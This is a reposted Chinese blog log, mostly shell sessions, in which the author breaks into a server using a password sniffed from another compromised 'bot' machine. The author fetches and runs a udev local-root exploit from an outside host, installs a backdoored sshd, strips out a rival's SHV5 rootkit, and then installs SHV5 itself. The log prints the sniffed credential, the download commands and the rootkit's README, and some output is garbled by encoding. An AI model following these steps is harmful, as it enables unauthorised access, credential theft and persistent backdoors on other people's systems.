我的一台linux肉鸡的简单手工入侵检测过程pc软件 文章资讯 手机软件

您当前的位置→图文中心安全防范我的一台linux肉鸡的简单手工入侵检测过程
阅读排行

我的一台linux肉鸡的简单手工入侵检测过程


2009/7/20  编辑:佚名 来源:本站整理

by:vitter

blog:blog.securitycn.net

就在今天发现一台肉鸡上某人的ssh连到另外一台服务器上, 记录下了密码。

[root@mail ~]# cat /tmp/sshpswd

ldc:sle823jfsGs@222.222.66.11

直接ssh上去。

[root@mail ~]# ssh ldc@222.222.66.11

ldc@222.222.66.11's password:

Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200

[ldc@localhost ldc]$ cat /etc/issue

Red Hat Enterprise Linux Server release 5 (Tikanga)

Kernel \r on an \m

[ldc@localhost ldc]$ uname -a

Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux

是rhel5.0没升级过内核, vmsplice的local root应该可以能够的, 不过测试了下, 机器挂了, 换udev的好了。

[ldc@localhost ldc]$ mkdir .v

[ldc@localhost ldc]$ cd .v

[ldc@localhost .v]$ wget http://211.100.50.70/u.sh

--13:21:09--  http://211.100.50.70/u.sh

Connecting to 211.100.50.70:80... 宸茶繛鎺ャ€

宸插彂鍑?HTTP 璇锋眰锛屾鍦ㄧ瓑寰呭洖搴?.. 200 OK

闀垮害锛?366 (3.3K) [application/x-sh]

Saving t `u.sh'

100%[===========================================================================================>] 3,366       --.-K/s   in 0.04s 

13:21:09 (93.7 KB/s) - `u.sh' saved [3366/3366]

[ldc@localhost .v]$ ls

r00t    r00t.c  u.sh

[ldc@localhost .v]$ chmod +x u.sh

[ldc@localhost .v]$ cat /proc/net/netlink

sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks

f69f8800 0   2486   00000111 0        0        00000000 2

f7fdae00 0   0      00000000 0        0        00000000 2

c2132200 6   0      00000000 0        0        00000000 2

f6a57a00 7   2143   00000001 0        0        00000000 2

f7caf000 7   0      00000000 0        0        00000000 2

f6a0be00 9   2143   00000000 0        0        00000000 2

f6a61200 9   1996   00000000 0        0        00000000 2

f7de1c00 9   0      00000000 0        0        00000000 2

f7d6ca00 10  0      00000000 0        0        00000000 2

f7fb3200 11  0      00000000 0        0        00000000 2

c2154200 15  476    ffffffff 0        0        00000000 2

f7fdac00 15  0      00000000 0        0        00000000 2

f7fb3000 16  0      00000000 0        0        00000000 2

c21cde00 18  0      00000000 0        0        00000000 2

[ldc@localhost .v]$ ps aux | grep udev

root       477  0.0  0.0  2916 1396 ?        S<   12:36   0:00 /sbin/udevd -d

ldc       3462  0.0  0.0  4128  680 pts/0    S    13:00   0:00 grep udev

[ldc@localhost .v]$ sh u.sh 476

suid.c: 鍦ㄥ嚱鏁?鈥榤ain鈥?涓細

suid.c:3: 璀﹀憡锛氶殣寮忓0鏄庝笌鍐呭缓鍑芥暟 鈥榚xecl鈥?涓嶅吋瀹

sh-3.1# id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh

已经是root权限了。

sh-3.1# w

13:25:18 up 48 min,  1 user,  load average: 0.00, 0.00, 0.00

USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT

ldc      pts/0    100.204.107.20    13:05    0.00s  0.12s  0.06s sshd: ldc [priv]

sh-3.1# pwd

/home/ldc/.v

sh-3.1# ssh -V

OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006

我们我自己先留个ssh的后门。

sh-3.1# wget http://211.100.50.70/openssh4.3p2.tar.gz

--13:32:08--  http://211.100.50.70/openssh4.3p2.tar.gz

Connecting to 211.100.50.70:80... 宸茶繛鎺ャ€

宸插彂鍑?HTTP 璇锋眰锛屾鍦ㄧ瓑寰呭洖搴?.. 200 OK

闀垮害锛?79990 (957K) [application/x-gzip]

Saving t `openssh4.3p2.tar.gz'

100%[===========================================================================================>] 979,990     1.14M/s   in 0.8s  

13:32:08 (1.14 MB/s) - `openssh4.3p2.tar.gz' saved [979990/979990]

sh-3.1# tar zxf openssh4.3p2.tar.gz

sh-3.1# cd openssh-4.3p2/

sh-3.1# ./configure --prefix=/usr --sysconfdir=/etc/ssh

checking for gcc... gcc

checking for C compiler default output file name... a.out

............(省略若干行)

sh-3.1# make && make install

conffile=`echo sshd_config.out | sed 's/.out$//'`; \

        /bin/sed -e 's|/etc/ssh/ssh_prng_cmds|/etc/ssh/ssh_prng_cmds|g' -e

............(省略若干行)

sh-3.1# cp ssh_config sshd_config /etc/ssh/

sh-3.1# /etc/rc.d/init.d/sshd restart

鍋滄 sshd锛                                              [纭畾]

鍚姩 sshd锛                                              [纭畾]

ok了, 用我们的sshdoor登录。

[root@localhost ~]# id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh

[root@localhost ~]# netstat -lntp

Active Internet connections (only servers)

Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name  

tcp        0      0 127.0.0.1:2208              0.0.0.0:*                   LISTEN      2298/hpiod         

tcp        0      0 0.0.0.0:1000                0.0.0.0:*                   LISTEN      2090/rpc.statd     

tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      2056/portmap       

tcp        0      0 0.0.0.0:21                  0.0.0.0:*                   LISTEN      2883/vsftpd        

tcp        0      0 127.0.0.1:631               0.0.0.0:*                   LISTEN      2315/cupsd         

tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      2361/sendmail: acce    

tcp        0      0 127.0.0.1:2207              0.0.0.0:*                   LISTEN      2303/python            

总感觉这系统system怪怪的, 连22端口都看不到, 应该替换了netstat了, 先看看有没有其他被替换掉的系统文件程序吧。

[root@localhost ~]# rpm -qaV

S.5..UG.   /bin/netstat

S.5..UG.   /sbin/ifconfig

S.5....T   /usr/bin/ssh-keygen

S.5....T c /etc/sysconfig/system-config-securitylevel

S.5..UG.   /usr/sbin/lsof

.M......   /var/tux

S.5....T c /etc/inittab

S.5....T   /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_dl14.map

S.5....T   /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_ndl14.map

S.5....T   /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_dl14.map

S.5....T   /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_ndl14.map

S.5....T   /usr/share/texmf-var/web2c/aleph.fmt

S.5....T   /usr/share/texmf-var/web2c/amstex.fmt

S.5....T   /usr/share/texmf-var/web2c/bamstex.fmt

S.5....T   /usr/share/texmf-var/web2c/bplain.fmt

S.5....T   /usr/share/texmf-var/web2c/cont-en.fmt

S.5....T   /usr/share/texmf-var/web2c/etex.fmt

..5....T   /usr/share/texmf-var/web2c/metafun.mem

S.5....T   /usr/share/texmf-var/web2c/mf.base

..5....T   /usr/share/texmf-var/web2c/mpost.mem

S.5....T   /usr/share/texmf-var/web2c/mptopdf.fmt

S.5....T   /usr/share/texmf-var/web2c/omega.fmt

S.5....T   /usr/share/texmf-var/web2c/pdfetex.fmt

S.5....T   /usr/share/texmf-var/web2c/pdftex.fmt

S.5....T   /usr/share/texmf-var/web2c/tex.fmt

.......T c /etc/kdump.conf

S.5....T c /etc/printcap

..5....T c /etc/pki/nssdb/secmod.db

....L... c /etc/pam.d/system-auth

.M...... c /etc/cups/classes.conf

.......T c /etc/audit/auditd.conf

missing     /usr/sbin/nscd

S.5....T c /etc/sysconfig/named

.M......   /var/named

SM5..UG.   /bin/ps

SM5..UG.   /usr/bin/top

SM5....T c /etc/sysconfig/iptables-config

S.5..UG.   /usr/bin/find

prelink: /usr/lib/libGL.so.1.2.#prelink#.crFdQJ Could not trace symbol resolving

S.?.....   /usr/lib/libGL.so.1.2

S.5....T c /etc/ppp/chap-secrets

S.5....T c /etc/ppp/pap-secrets

S.5....T c /etc/xml/catalog

S.5....T c /usr/share/sgml/docbook/xmlcatalog

S.5....T c /etc/ssh/ssh_config

S.5....T   /usr/bin/scp

S.5....T   /usr/bin/sftp

S.5....T   /usr/bin/ssh

S.5....T   /usr/bin/ssh-add

SM5...GT   /usr/bin/ssh-agent

S.5....T   /usr/bin/ssh-keyscan

S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/builtin35.map

S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/download35.map

S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/ps2pk.map

S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_pk.map

S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_t1.map

S.5....T   /etc/sgml/docbook-slides.cat

S.5....T   /usr/share/icons/hicolor/icon-theme.cache

S.5..UG.   /bin/ls

S.5..UG.   /usr/bin/dir

S.5..UG.   /usr/bin/md5sum

S.5..UG.   /usr/bin/pstree

S.5....T c /etc/syslog.conf

S.5....T c /etc/ssh/sshd_config

S.5....T   /usr/sbin/sshd

missing     /var/lib/texmf/ls-R

S.5....T   /etc/sgml/docbook-simple.cat

S.5....T c /etc/vsftpd/vsftpd.conf

.M......   /var/ftp/pub

S.5....T c /etc/mailcap

......G.   /var/cache/samba/winbindd_privileged

.......T c /etc/mail/sendmail.cf

SM5....T c /etc/mail/submit.cf

S.5....T c /var/log/mail/statistics

..5....T c /usr/lib/security/classpath.security

S.5....T c /etc/sane.d/dll.conf

还好rpm没替换, 看来系统的好些命令被替换了, 嘿嘿, 有同行就在啊。

不好意思, 那我就要T您下去了。 下面先检查一下, 当然这个系统不可靠了, 我们先替换回可靠的命令:

[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir

cp: cannot remove `/usr/bin/dir': Operation not permitted

chattr加了iau了。

[root@localhost bin]# chattr -iau /usr/bin/dir

[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir

ok了。 看看还是有什么吧:

[root@localhost chkrootkit-0.48]# lsattr /bin /sbin /usr/bin /usr/sbin /etc| grep -e -ia

s---ia------- /bin/ps

s---ia------- /bin/ls

s---ia------- /bin/netstat

s---ia------- /sbin/ifconfig

s---ia------- /sbin/ttymon

s---ia------- /sbin/ttyload

s---ia------- /usr/bin/top

s---ia------- /usr/bin/md5sum

s---ia------- /usr/bin/pstree.x11

s---ia------- /usr/bin/find

s---ia------- /usr/bin/dir

s---ia------- /usr/bin/pstree

s---ia------- /usr/sbin/lsof

s---ia------- /usr/sbin/ttyload

s---ia------- /etc/sh.conf

[root@localhost bin]# chattr -iau ps ls netstat

[root@localhost bin]# rm -rf ps ls netstat

[root@localhost bin]# rz

rz waiting to receive.奫root@localhost bin]# chmod +x ps ls netstat

[root@localhost bin]# chattr +iau ps ls netstat

同样的方式把/usr/sbin/lsof、/usr/bin/find等都替换回来。

再用netstat看看端口吧:

[root@localhost bin]# netstat -lntp

Active Internet connections (only servers)

Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name  

tcp        0      0 127.0.0.1:2208              0.0.0.0:*                   LISTEN      2298/hpiod         

tcp        0      0 0.0.0.0:1000                0.0.0.0:*                   LISTEN      2090/rpc.statd     

tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      2056/portmap       

tcp        0      0 0.0.0.0:21                  0.0.0.0:*                   LISTEN      2883/vsftpd        

tcp        0      0 127.0.0.1:631               0.0.0.0:*                   LISTEN      2315/cupsd         

tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      2361/sendmail: acce

tcp        0      0 0.0.0.0:65530               0.0.0.0:*                   LISTEN      2663/ttyload       (有东东出来了吧)

tcp        0      0 127.0.0.1:2207              0.0.0.0:*                   LISTEN      2303/python        

tcp        0      0 :::22                       :::*                        LISTEN      13935/sshd       

现在再用chkrootkit和rkhunter查一下看看:

[root@localhost .v]# ls

chkrootkit-0.48  chkrootkit.tar.gz  rkhunter  rkhunter-1.2.7.tar.gz

[root@localhost .v]# cd chkrootkit-0.48/

[root@localhost chkrootkit-0.48]# ./chkrootkit

ROOTDIR is `/'

Checking `amd'... not found

Checking `basename'... not infected

............(省略若干行)

Checking `ifconfig'... INFECTED

............(省略若干行)

Checking `pstree'... INFECTED

............(省略若干行)

Checking `top'... INFECTED

............(省略若干行)

Searching for t0rn's v8 defaults... Possible t0rn v8 \(or variation\) rootkit installed

............(省略若干行)

Searching for Showtee... Warning: Possible Showtee Rootkit installed 

............(省略若干行)

Searching for Romanian rootkit...  /usr/include/file.h /usr/include/proc.h

............(省略若干行)

上面几行都是有问题的。

下面用rkhunter, 它的log存在/var/log/rkhunter.log里面

[root@localhost rkhunter]# /usr/local/bin/rkhunter -c --createlogfile

Rootkit Hunter 1.2.7 is running

Determining OS... Unknown

Warning: This operating system is not fully supported!

Warning: Cannot find md5_not_known

All MD5 checks will be skipped!  (md5sum被替换了)

............(省略若干行)

   Rootkit 'SHV4'...                                          [ Warning! ]             (SHV4)

             --------------------------------------------------------------------------------

             Found parts of this rootkit/trojan by checking the default files and directories

             Please inspect the available files, by running this check with the parameter

             --createlogfile and check the log file (current file: /var/log/rkhunter.log).

             --------------------------------------------------------------------------------

[Press <ENTER> to continue]

   Rootkit 'SHV5'...                                          [ Warning! ]             (SHV5)

             --------------------------------------------------------------------------------

             Found parts of this rootkit/trojan by checking the default files and directories

             Please inspect the available files, by running this check with the parameter

             --createlogfile and check the log file (current file: /var/log/rkhunter.log).

             --------------------------------------------------------------------------------

............(省略若干行)

Scanning took 84 seconds

Scan results written to logfile (/var/log/rkhunter.log)

-----------------------------------------------------------------------

Do you have some problems, undetected rootkits, false positives, ideas

or suggestions?

Please e-mail me by filling in the contact form (@http://www.rootkit.nl)

-----------------------------------------------------------------------

下面我们看下log:

[root@localhost rkhunter]# cat /var/log/rkhunter.log

[15:16:51] Running Rootkit Hunter 1.2.7 on localhost.localdomain

[15:16:51]

Rootkit Hunter 1.2.7, Copyright 2003-2005, Michael Boelen

............(省略若干行)

[15:16:55] *** Start scan SHV4 ***

[15:16:55]   - File /etc/ld.so.hash... OK. Not found.

[15:16:55]   - File /lib/libext-2.so.7... OK. Not found.

[15:16:55]   - File /lib/lidps1.so... WARNING! Exists.  (去寻找到一个文件)

[15:16:55]   - File /usr/sbin/xntps... OK. Not found.

[15:16:55]   - Directory /lib/security/.config... OK. Not found.

[15:16:55]   - Directory /lib/security/.config/ssh... OK. Not found.

[15:17:04] *** Start scan SHV5 ***

[15:17:04]   - File /etc/sh.conf... WARNING! Exists.   (找到一个文件)

[15:17:04]   - File /dev/srd0... OK. Not found.

[15:17:04]   - Directory /usr/lib/libsh... WARNING! Exists.  (找到一个目录)

............(省略若干行)

下面手工核对下, 因为必备工具都是对已有的检查, 如果改过的, 他就找不到了。

[root@localhost sbin]# netstat -anp

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name  

tcp        0      0 0.0.0.0:65530               0.0.0.0:*                   LISTEN      2663/ttyload       

............(省略若干行)

raw        0      0 0.0.0.0:1                   0.0.0.0:*                   7           2679/ttymon        

............(省略若干行)

发现2个不正常的

[root@localhost sbin]# ps aux|grep 2663

root      2663  0.0  0.0   2128   516 ?        Ss   12:37   0:00 /sbin/ttyload -q   (原型出来了)

root     15350  0.0  0.0   4088   604 pts/0    S+   15:21   0:00 grep 2663

[root@localhost sbin]# lsof -p 2663

COMMAND  PID USER   FD   TYPE DEVICE    SIZE     NODE NAME

3       2663 root  cwd    DIR  253,0    4096        2 /

3       2663 root  rtd    DIR  253,0    4096        2 /

3       2663 root  txt    REG  253,0  652620 34897965 /tmp/sh-AQJ3OQYACSO (deleted)  (是个压缩的)

3       2663 root  mem    REG  253,0  121684  8586729 /lib/ld-2.5.so

3       2663 root  mem    REG  253,0 1576952  8586730 /lib/libc-2.5.so

3       2663 root  mem    REG  253,0  101036  8586743 /lib/libnsl-2.5.so

3       2663 root  mem    REG  253,0   15264  8586757 /lib/libutil-2.5.so

3       2663 root  mem    REG  253,0   27836  8585303 /lib/libcrypt-2.5.so

3       2663 root    0u   CHR    1,3             1517 /dev/null

3       2663 root    1u   CHR    1,3             1517 /dev/null

3       2663 root    2u   CHR    1,3             1517 /dev/null

3       2663 root    3u  IPv4   9895              TCP *:65530 (LISTEN)

[root@localhost sbin]# lsof -p 2679

COMMAND  PID USER   FD   TYPE DEVICE    SIZE    NODE NAME

ttymon  2679 root  cwd    DIR  253,0    4096       2 /

ttymon  2679 root  rtd    DIR  253,0    4096       2 /

ttymon  2679 root  txt    REG  253,0   93476  852119 /sbin/ttymon

ttymon  2679 root  mem    REG  253,0   46740 8585257 /lib/libnss_files-2.5.so

ttymon  2679 root  mem    REG  253,0  121684 8586729 /lib/ld-2.5.so

ttymon  2679 root  mem    REG  253,0 1576952 8586730 /lib/libc-2.5.so

ttymon  2679 root    3u   raw                   9925 00000000:0001->00000000:0000 st=07

监听65530端口的是个ssh后门:

[root@localhost sbin]# nc 127.0.0.1 65530

SSH-1.5-2.0.13

Protocol mismatch.

密码应该在:

[root@localhost sbin]# cat /etc/sh.conf

76800957735704ee3dd8ac42779db49a  -

加密了, 我们再看看另外一个配置文件:

[root@localhost sbin]# cat /lib/lidps1.so

ttyload

shsniff

shp

shsb

hide

burim

synscan

mirkforce

ttymon

sh2-power

看来是ps的配置文件。

看看另外一个进程:

[root@localhost sbin]# strings /sbin/ttymon

............(省略若干行)

Usage: %s <dst> <src> <size> <number>

Ports are set to send and receive on port 179

dst:    Destination Address

src:    Source Address

size:   Size of packet which should be no larger than 1024 should allow for xtra header info thru routes

num:    packets

Could not resolve %s fucknut

根据记录这个Google了下, 应该是个dos工具。 感兴趣的可以编译下玩玩看看:http://www.securityfocus.com/archive/82/334848这里有。

ok我们现在进入黑客的老巢:

[root@localhost sbin]# cd /usr/lib/libsh

[root@localhost libsh]# ls -al

total 140

drwxr-xr-x   6 root  root   4096 Dec 18  2008 .

drwxr-xr-x 118 root  root  69632 Jul 17 13:55 ..

drwxr-xr-x   2 root  root   4096 Dec 18  2008 .backup

-rwxr-xr-x   1   122   114  1206 Apr 18  2003 .bashrc

-rwxr-xr-x   1   122   114  2000 Nov 28  2006 hide

drwxr-xr-x   2 root  root   4096 Dec 18  2008 .owned

-rwxr-xr-x   1   122   114  1345 Nov 28  2006 shsb

drwxr-xr-x   2 root  root   4096 Jul 14 04:03 .sniff

drwxr-xr-x   2 gaobo gaobo  4096 Nov 28  2006 utilz

[root@localhost libsh]# ls .backup/

dir  find  ifconfig  ls  lsof  md5sum  netstat  ps  pstree  top

上面就是我们系统备分COPY的文件, 直接恢复即可。

find搜下其他的配置文件。 此步骤省略。 最后都找到了:

[root@localhost libsh]# find / -nouser

/lib/libsh.so/shhk.pub

/lib/libsh.so/shhk

/lib/libsh.so/shrs

............(省略若干行)

[root@localhost libsh]# cd /lib/libsh.so/

[root@localhost libsh.so]# ls

bash  shdcf  shhk  shhk.pub  shrs

这个目录是ssh的配置文件

其他的用关键字就可以了:如find / -name "*" -exec grep -l "ttyload" {} \;

[root@localhost lib]# cat /usr/include/proc.h

3 burim

3 mirkforce

3 synscan

3 ttyload

3 shsniff

3 ttymon

3 shsb

3 shp

3 hide

4 ttyload

[root@localhost lib]# cat /usr/include/file.h

sh.conf

libsh

.sh

system

shsb

libsh.so

shp

shsniff

srd0

[root@localhost lib]# cat /usr/include/hosts.h

2 212.110

2 195.26

2 194.143

2 62.220

3 2002

4 2002

3 6667

4 6667

3 65530

4 65530

[root@localhost lib]# cat /usr/include/log.h

mirkforce

synscan

syslog

那看看他怎么启动的:

[root@localhost lib]# cat /etc/inittab

#

# inittab       This file describes how the INIT process should set up

#               the system in a certain run-level.

#

# Author:       Miquel van Smoorenburg, <miquels@drinkel.nl.mugnet.org>

#               Modified for RHS Linux by Marc Ewing and Donnie Barnes

#

# Default runlevel. The runlevels used by RHS are:

#   0 - halt (Do NOT set initdefault to this)

#   1 - Single user mode

#   2 - Multiuser, without NFS (The same as 3, if you do not have networking)

#   3 - Full multiuser mode

#   4 - unused

#   5 - X11

#   6 - reboot (Do NOT set initdefault to this)

#

id:5:initdefault:

# System initialization.

si::sysinit:/etc/rc.d/rc.sysinit

l0:0:wait:/etc/rc.d/rc 0

l1:1:wait:/etc/rc.d/rc 1

l2:2:wait:/etc/rc.d/rc 2

l3:3:wait:/etc/rc.d/rc 3

l4:4:wait:/etc/rc.d/rc 4

l5:5:wait:/etc/rc.d/rc 5

l6:6:wait:/etc/rc.d/rc 6

# Trap CTRL-ALT-DELETE

ca::ctrlaltdel:/sbin/shutdown -t3 -r now

# When our UPS tells us power has failed, assume we have a few minutes

# of power left.  Schedule a shutdown for 2 minutes from now.

# This does, of course, assume you have powerd installed and your

# UPS connected and working correctly. 

pf::powerfail:/sbin/shutdown -f -h +2 "Power Failure; System Shutting Down"

# If power was restored before the shutdown kicked in, cancel it.

pr:12345:powerokwait:/sbin/shutdown -c "Power Restored; Shutdown Cancelled"

# Run xdm in runlevel 5

x:5:respawn:/etc/X11/prefdm -nodaemon

# Loading standard ttys

0:2345:once:/usr/sbin/ttyload        (在这里了)

# Run gettys in standard runlevels

1:2345:respawn:/sbin/mingetty tty1

2:2345:respawn:/sbin/mingetty tty2

3:2345:respawn:/sbin/mingetty tty3

4:2345:respawn:/sbin/mingetty tty4

5:2345:respawn:/sbin/mingetty tty5

6:2345:respawn:/sbin/mingetty tty6

# modem getty.

# m235:respawn:/usr/sbin/mgetty -s 38400 modem

# fax getty (hylafax)

# m35:respawn:/usr/lib/fax/faxgetty /dev/modem

# vbox (voice box) getty

# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6

# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7

# end of /etc/inittab

看看他的启动文件:

[root@localhost lib]# cat /usr/sbin/ttyload

/sbin/ttyload -q >/dev/null 2>&1

/sbin/ttymon >/dev/null 2>&1

上面除了工具, 我们可以通过手工的方式对rootkit来进行了一些不复杂的分析, 这个是个没有修改过的SHV5。 以上只是一些思路, 在对待入侵问题上要具体问题具体分析, 这个相对简单了点。

下面我们测试下这个SHV5:

[root@localhost .v]# wget http://211.100.50.70/shv5.tar.gz

解压、安装:

[root@localhost .v]# tar zxf shv5.tar.gz

[root@localhost .v]# cd shv5

[root@localhost shv5]# ls

bin.tgz  conf.tgz  lib.tgz  README  setup  utilz.tgz

[root@localhost shv5]# cat README

############

### shv5 ###

############

                   MMMMMMM                                   MMMMMMMMMMMMMMM  

                   MMMMMMM                                   MMMMMMMMMMMMMMM  

                   MMMMMMM                                   MMMMMMMMMMMMMMM  

                   MMMMMMM                                   MMMMMMMMMMMMMMM  

                   MMMMMMM                                   MMMMMM           

           MMMMMM  MMMMMMMMMMMMMMMM     MMMMMMM    MMMMMMM   MMMMMM           

         MMMMMMMM  MMMMMMMMMMMMMMMMM    MMMMMMM    MMMMMMM   MMMMMMMMMMMM     

        MMMMMMMMM  MMMMMMMMMMMMMMMMMM   MMMMMMM    MMMMMMM   MMMMMMMMMMMMMM   

       MMMMMMMMMM  MMMMMMMMMMMMMMMMMM   MMMMMMM    MMMMMMM        MMMMMMMMMM  

       MMMMMMM     MMMMMMM    MMMMMMM   MMMMMMM    MMMMMMM          MMMMMMMM  

       MMMMMMM     MMMMMMM    MMMMMMM    MMMMMM    MMMMMM            MMMMMMMM 

       MMMMMMM     MMMMMMM    MMMMMMM    MMMMMMM  MMMMMMM            MMMMMMMM 

    MMMMMMMMMM     MMMMMMM    MMMMMMM     MMMMMMMMMMMMMM    MMM     MMMMMMMM  

  MMMMMMMMMMM      MMMMMMM    MMMMMMM      MMMMMMMMMMMMM    MMMMMMMMMMMMMMMM  

MMMMMMMMMMM       MMMMMMM    MMMMMMM       MMMMMMMMMMM     MMMMMMMMMMMMMMM   

MMMMMMMMMM        MMMMMMM    MMMMMMM        MMMMMMMMM      MMMMMMMMMMMMM     

MMMMMMMM          MMMMMMM    MMMMMMM          MMMMM            MMMMMMM       

DISCLAIMER:

* The purpose of these coded instructions, statements and computer

* programs is for TEST AIMS ONLY !

* Their use/misuse is at USERS OWN RISK !

* We do not take any responsibility for any harm or damage caused

* by the use of this file-package.

* This includes copying, duplicating or modifying it in any form !

* USERS WHO USE THIS CODED INSTRUCTIONS, STATEMENTS AND COMPUTER

* PROGRAMS MUST ACCEPT ALL ABOVE STATEMENTS !

* OTHERWISE U ARE OBLIGED TO DELETE THESE FILES IMEDIATELY !

CHANGES [shv5]:

-> - new sshd backdor with env-settings (avoids history logging)

   - The new sshd is in between 1.2.25-2.0.13 SSHD (from ssh.com)

   - not so big and with new great features designed to suite shv5.

-> new rk-dirs coz of lamme anti-shv4 release

-> new security-checks on the script

   - latest flaws included (mod_ssl, samba, sendmail etc..)

-> setup-script rewriten to become more soft (friendly)

-> added new addons (tripwire, snort ... fucker :))

-> added basic utilz on rootkit (i hate dld them on each box)

-> we use md5sum passwords now (more l33t and secure)

USAGE:

-> - If u expect me to tell you how/what/if/when/where type of

   - questions delete these files imediately! This is not for you!

TOD

-> tcpdump trojan

-> crontab trojan

-> sendmail backdoor

-> ftp backdoor

-> httpd backdoor

-> any other idea ?!?!?! < mail: pint@dosnet.info >

[root@localhost shv5]# ./setup sshdoor 8585

[sh]# Installing shv5 ... this wont take long

[sh]# If u think we will patch your holes shoot yourself !

[sh]# so patch manualy and fuck off!

============================================================================

MMMMM                           MMMMMM                            

MMM    MMMMMMMMM   MMMM    MMMM    MMM  

  • Presenting u shv5-rootkit ! 

    MMM   MMMM   MMMM  MMMM    MMMM    MMM  

  • Designed for internal use ! 

    MMM   MMMMMMM      MMMMMMMMMMMM    MMM                                   

    MMM     MMMMMMMM   MMMMMMMMMMMM    MMM  

  • brought to you by: PinT
  • [x]  

    MMM          MMMM  MMMM    MMMM    MMM  

  • April ) 2003 )              

    MMM   MMMM   MMMM  MMMM    MMMM    MMM                                   

    MMM    MMMMMMMMM   MMMM    MMMM    MMM  

  •     *** VERY PRIVATE ***     

    MMM                                MMM  

  • *** so dont distribute ***  

    MMMMM       -C- -R- -E- -W-     MMMMMM                                   

    ============================================================================

  • [sh]# backdooring started on localhost.localdomain

    [sh]#                                                                 

    [sh]#                                                                 

    [sh]# checking for remote logging...   guess not.

    [sh]# checking for tripwire...  guess not.

    [sh]# [Installing trojans....]                                        

    [sh]#  Using Password : sshdoor                                      

    [sh]#         Using ssh-port : 8585                                

    mkdir: cannot create directory `/usr/lib/libsh': File exists

    mkdir: cannot create directory `/usr/lib/libsh/.backup': File exists

    [sh]#          : ps/ls/top/netstat/ifconfig/find/ and rest backdoored

    [sh]#                                                                 

    [sh]# [Installing some utils...]                                      

    [sh]#          : mirk/synscan/others... moved                     

    [sh]# [Moving our files...]                                           

    mkdir: cannot create directory `/usr/lib/libsh/.sniff': File exists

    [sh]#          : sniff/parse/sauber/hide moved                     

    [sh]# [Modifying system settings to suite our needs]                   

    [sh]# Checking for vuln-daemons ...                   

    Unknown HZ value! (194) Assume 100.

    [sh]# RPC.STATD found - patch it bitch !!!!             

    mkdir: cannot create directory `/usr/lib/libsh/.owned': File exists

    --------------------------------------------------------------------

    [sh]# [System Information...]

    [sh]# Hostname : localhost.localdomain (222.222.66.11)

    [sh]# Arch : 2007 -+- bogomips : 6003.55

    5999.45 '

    [sh]# Alternative IP : 127.0.0.1 -+-  Might be [1 ] active adapters.

    [sh]# Distribution: Red Hat Enterprise Linux Server release 5 (Tikanga)

    --------------------------------------------------------------------

    [sh]# ipchains ... ?

    [sh]# lucky for u no ipchains found

    --------------------------------------------------------------------

    [sh]# iptables ...?

    iptables: No chain/target/match by that name

    --------------------------------------------------------------------

    [sh]# Just ignore all errors if any !

    [sh]# ============================== Backdooring completed in :3 seconds

    [root@localhost shv5]# nc 127.0.0.1 8585

    SSH-1.5-2.0.13

    Protocol mismatch.

    根据SHV5的setup脚本我们可以稍微改下变成全自动卸载的脚本, 之后附在文后。

    累死了, 赶紧回家休息。

    相关文章
  • 如何快速学习javascript?我的java之路!
  • 微信我的车是什么?微信我的车在哪?
  • 该带我的狗看兽医吗?狗脸木头吸30万网友热议
  • 如何去除“我的电脑”里爱奇艺pps影音的图标?
  • 我的世界末日传送门搭建方法图文详解
  • 微博我的故事可以保存吗 怎么保存别人的微博故事视频
  • 怎么关闭微博我的故事 微博故事关闭方法详解
  • 《我的世界》宣布加入跨平台游玩功能 4K系Xbox One X独占
  • 一位创业者的失败自述:忽略这一环,要了我的命!
  • 当年坑我的回收佬还在?我们暗访了二手手机市场
  • 我的世界中国版刷怪笼怎么制作 刷怪笼制作方式详解
  • 我的共享一天,有点荒唐,又有点满足
  • 我的世界陷阱怎么做?小凉亭陷阱详细制作方法
  • 《LOL》我的盛典礼盒升级任务大全
  • 王者荣耀教会我的事
  • 我的世界自定义密码锁怎么做 自定义密码锁制作教程
  • 《我的世界》1.12版新方块混凝土详解
  • 《我的世界》如何正确种植竹子
  • 王者荣耀教会我的事
  • 罗斯威尔岩石外星人给我的信息 罗斯维尔石
  • 发表评论
    网站帮助 - 广告合作 - 下载声明 - 网站地图